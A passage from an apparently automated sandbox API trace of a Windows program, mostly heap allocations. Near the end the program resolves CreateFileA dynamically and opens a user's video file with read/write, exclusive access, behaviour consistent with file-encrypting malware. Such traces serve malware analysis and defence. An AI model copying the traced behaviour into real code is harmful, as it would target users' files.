Flags=0x0, Size=0x10) returned 0x889988 [0042.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0042.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0042.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0042.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0042.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0042.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0042.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0042.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0042.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0042.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0042.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0042.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0042.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0042.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0042.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0042.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0042.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0042.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0042.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0042.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0042.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0042.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0042.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0042.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0042.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0042.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0042.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0042.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0042.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0042.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0042.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0042.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0042.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0042.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0042.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0042.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0042.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0042.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0042.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0042.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0042.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0042.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0042.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0042.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0042.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0042.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0042.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0042.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0042.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0042.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0042.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0042.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0042.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0042.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0042.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0042.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0042.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0042.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0042.312] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0042.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0042.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0042.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0042.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0042.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0042.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0042.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0042.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0042.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0042.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0042.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0042.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0042.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0042.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0042.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0042.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0042.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0042.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0042.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0042.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0042.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0042.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0042.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0042.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0042.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0042.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0042.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0042.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0042.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0042.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0042.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0042.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0042.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0042.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0042.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0042.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0042.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0042.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0042.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0042.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0042.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0042.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0042.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0042.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0042.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0042.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0042.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0042.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0042.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0042.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0042.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0042.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0042.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0042.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0042.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0042.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0042.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0042.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0042.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0042.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0042.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0042.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0042.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0042.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0042.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0042.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.315] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0042.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0042.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88cb80 [0042.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88cb80, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0042.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0042.316] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0042.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0042.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0042.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0042.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0042.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0042.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb80 [0042.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88cb80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0042.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0042.316] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0042.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0042.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0042.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0042.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0042.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0042.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0042.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0042.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0042.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0042.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0042.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xab2010 [0042.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\E- koDk.mkv", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0042.317] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0042.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\E- koDk.mkv", cchWideChar=56, lpMultiByteStr=0x7c2080, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\E- koDk.mkv", lpUsedDefaultChar=0x0) returned 56 [0042.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0042.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0042.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0042.318] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\E- koDk.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl\\e- kodk.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0042.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0042.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0042.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0042.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0042.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0042.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0042.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0042.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0042.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.318] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0042.318] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0042.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0042.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0042.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0042.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=56, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0042.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0042.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=56, lpWideCharStr=0x7db378, cchWideChar=56 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\E- koDk.mkv") returned 56 [0042.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0042.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0042.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0042.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0042.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0042.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0042.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0042.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0042.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0042.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0042.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0042.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0042.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0042.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0042.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0042.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0042.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0042.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0042.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0042.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0042.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0042.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0042.319] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0042.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0042.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0042.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0042.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0042.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.320] HeapFree (in: 